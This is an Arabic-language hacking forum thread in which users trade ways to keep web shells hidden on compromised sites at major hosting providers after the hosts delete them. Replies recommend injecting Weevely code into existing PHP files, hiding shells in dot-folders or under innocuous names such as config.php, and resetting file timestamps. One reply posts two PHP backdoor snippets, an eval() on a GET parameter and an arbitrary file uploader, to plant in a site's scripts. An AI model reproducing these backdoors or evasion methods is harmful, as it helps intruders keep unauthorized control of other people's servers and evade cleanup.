الحماية للأبد -Security 4 Ever


الحماية للأبد -Security 4 Ever (https://www.sec4ever.com/home/index.php)
-   قسم الأخبار التقنية والنقاشات الجادة (https://www.sec4ever.com/home/forumdisplay.php?f=98)
-   -   طرق اخفاء ادواتك في السيرفرات المشهوره (https://www.sec4ever.com/home/showthread.php?t=13068)

أسامه 511 01-08-2013 05:01 AM

طرق اخفاء ادواتك في السيرفرات المشهوره
 




السلام عليكم ورحمة الله وبركاته


حبيت نتناقش في طرق اخفاء الشيلات والأدوات في السيرفرات المتقدمه
مثل justhost
bluehost
hostgator
godaddy

انا من ارفع شيل على احد هذا السيرفرات مايجلس 1-4ساعات الا والشيل محذوف والثغره مرقعه بـ(فوربيدن) ddd
مع اني الغم الهاتكس( اتش تي اكسس)
لكن بلا فائده لهذا فتحت الموضوع لنتناقش فيه وفي طرق اخفاء الشيلات من هذي السيرفرات ...! :confused:
مع العلم اني احذف اللوق من على الموقع ..!
فهل هناك حل ؟؟ لأخفاء الشيلات والاداوات
عندي سيرفر مخترقه من عام 2011 لكن ماطار الشيل والروت معيـ :confused:
فكيف في خلال 1-5ساعات على الكثير ويطير كل شغلك :confused:
وبـ التوفيق للكل ان شاءالله

الرجاء الأبتعاد عن الألفاظ التافهه









Charaf Anons 01-08-2013 06:27 AM

رد: طرق اخفاء ادواتك في السيرفرات المشهوره
 
just don't edit the .htaccess ... i have many shells on godaddy and it's ok

sahrawi 01-08-2013 07:57 AM

رد: طرق اخفاء ادواتك في السيرفرات المشهوره
 
لما سمعت اداوتك ظنيت انك تعني رافع جوهن او ادوات فحص اخرى
حبيبي الشل ابسط شيئ انك تلغم لوحة التحكم
او تلغم السكريبت بتغرة الاوامر او لوفي ...


أسامه 511 01-08-2013 08:23 AM

رد: طرق اخفاء ادواتك في السيرفرات المشهوره
 
اقتباس:

المشاركة الأصلية كتبت بواسطة med_bad_boy (المشاركة 66257)
لما سمعت اداوتك ظنيت انك تعني رافع جوهن او ادوات فحص اخرى
حبيبي الشل ابسط شيئ انك تلغم لوحة التحكم
او تلغم السكريبت بتغرة الاوامر او لوفي ...


صدقني اخوي هذا اول شي فكرت فيه وجربت ..!
لكن المشكله انهم يطيرون الأدوات وكل شيء رافعه على الموقع
وكأن شي ماصار يعني حتى لو الغم لوحة التحكم كلها 5ساعات ويحذفون الاكواد
هذآ اللي محيرني ....!!

Virus Duba 01-08-2013 10:21 AM

رد: طرق اخفاء ادواتك في السيرفرات المشهوره
 
أخي في خاصية في سكريبت WHME الجديد اذا رفع اي شخص اي ملف على السيرفر يظهر مسار الملف عند الدعم الفني
حتى لو صورة رافعها صاحب الموقع

فمهما حاولت لن تخفيه عليه

ولا ادري ان كان تغير مسمى الملفات يظهر ايضا ام لا

فلو كان لا يظهر فا من الممكن تغير بيانات ملف اساسي بالشل مثل ملف help.php على سبيل المثال


لكن اعتقد انهم يتتبعون كل شيء

Mr.Shadow-h4ck 01-08-2013 10:59 AM

رد: طرق اخفاء ادواتك في السيرفرات المشهوره
 
احقن كود weevely في اي ملف php

Dr.5RaB 01-08-2013 12:32 PM

رد: طرق اخفاء ادواتك في السيرفرات المشهوره
 
مثل ما قال الاخ [ Mr.Shadow-h4ck ] ^_^ آتفق معك خوش طريقة ،
و اذا تبي تخفي إلشـل < شفره ^_^ او سو لك ملفآت بإسم [ .folder ] لازم إلنقطه قبل آإلكلمةة ،

آو مثل ما قآل الآآخ [
Uz41r ]


إجعل آسآمي ملفآتــك [ help.php , style.php , config.php ] إلخ إلخ إلخ ،

الاسآآمي الإفترآضيةة تنفــع دآئمـآ :)

UzunDz 01-08-2013 12:45 PM

رد: طرق اخفاء ادواتك في السيرفرات المشهوره
 
لما ترفع شل يترفع ولكن الوقت يكون مغاير لباقي الملفات الأخرى
فيه امر للتغيير وارجاع الوقت كما في الملفات الاخرى
ابحث عنه ،، بدوري اذا وجدته في ملفاتي راح ارفقه

the_master 01-08-2013 12:48 PM

رد: طرق اخفاء ادواتك في السيرفرات المشهوره
 
و ليه شيل و ليه الافتكاسات دي كلها

اي ملف من ملفات السكريبت ،، عدل عليه و ارشق كودك ،،

مثلا ثغرة لذيذة زي دي

كود PHP:

if ($_GET[master])
{

eval(
$_GET[master])



او خازوق زي ده

</b>
كود PHP:

$UP $_GET['up'];
if(isset(
$UP) && !empty($UP)){
echo
"".$_FILES['userfile']."";
$uploaddir './';
$uploadfile $uploaddir basename($_FILES['userfile']['name']);
if ( isset(
$_FILES["userfile"]) ) {
    echo 
'<p><font color="#00FF00" size="7">Uploaded</font></p>';
    if (
move_uploaded_file
($_FILES["userfile"]["tmp_name"], $uploadfile))
echo 
$uploadfile;
    else echo 
'<p><font color="#FF0000" size="7">Failed</font></p>';
}



</b>
الافكار كتير .. الخ الخ الخ ..

السيرفرات دي انا عندي أكسس عليهم من زماان .. و مفيش اي حاجة من الكلام ال بتقوله دا

صباح الفل ddd

أسامه 511 01-08-2013 02:41 PM

رد: طرق اخفاء ادواتك في السيرفرات المشهوره
 
بارك الله فيكم
واتمنى من الجميع المشاركة لــ.(تعم الفائدة على لجميع)


الساعة الآن 02:31 AM

Powered by vBulletin® Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.